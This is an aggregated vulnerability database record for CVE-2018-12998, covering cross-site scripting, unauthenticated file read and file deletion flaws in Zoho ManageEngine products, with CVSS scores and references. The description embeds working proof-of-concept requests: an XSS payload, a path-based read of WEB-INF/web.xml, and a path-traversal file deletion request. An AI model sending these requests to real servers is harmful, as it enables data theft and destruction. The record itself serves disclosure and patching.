Details of VAR-201806-1164

ID

VAR-201806-1164

CVE

CVE-2018-12998

TITLE

plural Zoho ManageEngine Product cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2018-006785

DESCRIPTION

A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. plural Zoho ManageEngine The product contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ZOHO ManageEngine Netflow Analyzer, etc. are all products of the American company ZOHO. ZOHO ManageEngine Netflow Analyzer is a set of web-based bandwidth monitoring tools. Network Configuration Manager is a suite of network configuration management, network change and configuration management (NCCM) software for configuring switches, routers, firewalls, and other network devices. There are cross-site scripting vulnerabilities in many ZOHO products. This issue has been reported to the vendor who has already published patches for this issue. https://www.manageengine.com/products/applications_manager/issues.html ========================== Advisory:Zoho manageengine Applications Manager Reflected XSSVulnerability Author: M3 From DBAppSecurity Affected Version: All ========================== Proof of Concept: ========================== /GraphicalView.do?method=createBusinessService"scriptalert(5045)/script Notice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. http://opmanager.helpdocsonline.com/read-me ========================== Advisory:Zoho manageengine Arbitrary File Read in multiple Products Author: M3 From DBAppSecurity Affected Products: Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer ========================== Proof of Concept: ========================== POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx Notice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue. ========================== Advisory: Zoho manageengine Desktop Central Arbitrary File Deletion Author: M3 From DBAppSecurity Affected Products:Desktop Central ========================== Proof of Concept: ========================== POST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif Notice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue

Trust: 1.89

sources: NVD: CVE-2018-12998 // JVNDB: JVNDB-2018-006785 // VULHUB: VHN-123013 // VULMON: CVE-2018-12998 // PACKETSTORM: 148635

AFFECTED PRODUCTS

vendor:	zohocorp	model:	firewall analyzer	scope:	eq	version:	-	Trust: 1.6
vendor:	zohocorp	model:	manageengine netflow analyzer	scope:	eq	version:	-	Trust: 1.6
vendor:	zohocorp	model:	manageengine network configuration manager	scope:	eq	version:	-	Trust: 1.0
vendor:	zohocorp	model:	manageengine oputils	scope:	eq	version:	-	Trust: 1.0
vendor:	zohocorp	model:	manageengine opmanager	scope:	eq	version:	-	Trust: 1.0
vendor:	zoho	model:	manageengine firewall analyzer	scope:	lt	version:	build 123147	Trust: 0.8
vendor:	zoho	model:	manageengine netflow analyzer	scope:	lt	version:	build 123137	Trust: 0.8
vendor:	zoho	model:	manageengine network configuration manager	scope:	lt	version:	build 123128	Trust: 0.8
vendor:	zoho	model:	manageengine opmanager	scope:	lt	version:	build 123148	Trust: 0.8
vendor:	zoho	model:	manageengine oputils	scope:	lt	version:	build 123161	Trust: 0.8
vendor:	zohocorp	model:	network configuration manager	scope:	eq	version:	-	Trust: 0.6
vendor:	zohocorp	model:	oputils	scope:	eq	version:	-	Trust: 0.6
vendor:	zohocorp	model:	opmanager	scope:	eq	version:	-	Trust: 0.6

sources: JVNDB: JVNDB-2018-006785 // CNNVD: CNNVD-201807-036 // NVD: CVE-2018-12998

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2018-12998
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2018-12998
value:	MEDIUM
Trust: 0.8
CNNVD:	CNNVD-201807-036
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-123013
value:	MEDIUM
Trust: 0.1
VULMON:	CVE-2018-12998
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2018-12998
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
VULHUB:	VHN-123013
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2018-12998
baseSeverity:	MEDIUM
baseScore:	6.1
vectorString:	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	REQUIRED
scope:	CHANGED
confidentialityImpact:	LOW
integrityImpact:	LOW
availabilityImpact:	NONE
exploitabilityScore:	2.8
impactScore:	2.7
version:	3.1
Trust: 1.0
NVD:	CVE-2018-12998
baseSeverity:	MEDIUM
baseScore:	6.1
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	REQUIRED
scope:	CHANGED
confidentialityImpact:	LOW
integrityImpact:	LOW
availabilityImpact:	NONE
exploitabilityScore:	NONE
impactScore:	NONE
version:	3.0
Trust: 0.8

sources: VULHUB: VHN-123013 // VULMON: CVE-2018-12998 // JVNDB: JVNDB-2018-006785 // CNNVD: CNNVD-201807-036 // NVD: CVE-2018-12998

PROBLEMTYPE DATA

problemtype:

CWE-79

Trust: 1.9

sources: VULHUB: VHN-123013 // JVNDB: JVNDB-2018-006785 // NVD: CVE-2018-12998

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201807-036

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 148635 // CNNVD: CNNVD-201807-036

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-006785

PATCH

title:	Top Page	url:	https://www.manageengine.com/	Trust: 0.8
title:	Multiple ZOHO Fixes for product cross-site scripting vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81655	Trust: 0.6
title:	Kenzer Templates [5170] [DEPRECATED]	url:	https://github.com/ARPSyndicate/kenzer-templates	Trust: 0.1

sources: VULMON: CVE-2018-12998 // JVNDB: JVNDB-2018-006785 // CNNVD: CNNVD-201807-036

EXTERNAL IDS

db:	NVD	id:	CVE-2018-12998	Trust: 2.7
db:	CNNVD	id:	CNNVD-201807-036	Trust: 2.4
db:	PACKETSTORM	id:	148635	Trust: 1.9
db:	JVNDB	id:	JVNDB-2018-006785	Trust: 0.8
db:	VULHUB	id:	VHN-123013	Trust: 0.1
db:	VULMON	id:	CVE-2018-12998	Trust: 0.1

sources: VULHUB: VHN-123013 // VULMON: CVE-2018-12998 // JVNDB: JVNDB-2018-006785 // PACKETSTORM: 148635 // CNNVD: CNNVD-201807-036 // NVD: CVE-2018-12998

REFERENCES

url:	https://github.com/unh3x/just4cve/issues/10	Trust: 2.6
url:	http://seclists.org/fulldisclosure/2018/jul/75	Trust: 1.8
url:	http://packetstormsecurity.com/files/148635/zoho-manageengine-13-13790-build-xss-file-read-file-deletion.html	Trust: 1.8
url:	http://www.cnnvd.org.cn/web/xxk/ldxqbyid.tag?cnnvd=cnnvd-201807-036	Trust: 1.8
url:	https://nvd.nist.gov/vuln/detail/cve-2018-12998	Trust: 0.9
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12998	Trust: 0.8
url:	https://cwe.mitre.org/data/definitions/79.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://github.com/arpsyndicate/kenzer-templates	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2018-12999	Trust: 0.1
url:	https://www.manageengine.com/products/applications_manager/issues.html	Trust: 0.1
url:	http://opmanager.helpdocsonline.com/read-me	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2018-12997	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2018-12996	Trust: 0.1

sources: VULHUB: VHN-123013 // VULMON: CVE-2018-12998 // JVNDB: JVNDB-2018-006785 // PACKETSTORM: 148635 // CNNVD: CNNVD-201807-036 // NVD: CVE-2018-12998

CREDITS

Xiaotian Wang

Trust: 0.1

sources: PACKETSTORM: 148635

SOURCES

db:	VULHUB	id:	VHN-123013
db:	VULMON	id:	CVE-2018-12998
db:	JVNDB	id:	JVNDB-2018-006785
db:	PACKETSTORM	id:	148635
db:	CNNVD	id:	CNNVD-201807-036
db:	NVD	id:	CVE-2018-12998

LAST UPDATE DATE

2024-08-14T14:12:51.084000+00:00

SOURCES UPDATE DATE

db:	VULHUB	id:	VHN-123013	date:	2018-08-20T00:00:00
db:	VULMON	id:	CVE-2018-12998	date:	2023-12-07T00:00:00
db:	JVNDB	id:	JVNDB-2018-006785	date:	2018-08-31T00:00:00
db:	CNNVD	id:	CNNVD-201807-036	date:	2021-09-01T00:00:00
db:	NVD	id:	CVE-2018-12998	date:	2023-12-07T20:06:40.657

SOURCES RELEASE DATE

db:	VULHUB	id:	VHN-123013	date:	2018-06-29T00:00:00
db:	VULMON	id:	CVE-2018-12998	date:	2018-06-29T00:00:00
db:	JVNDB	id:	JVNDB-2018-006785	date:	2018-08-31T00:00:00
db:	PACKETSTORM	id:	148635	date:	2018-07-22T17:22:56
db:	CNNVD	id:	CNNVD-201807-036	date:	2018-07-02T00:00:00
db:	NVD	id:	CVE-2018-12998	date:	2018-06-29T12:29:00.500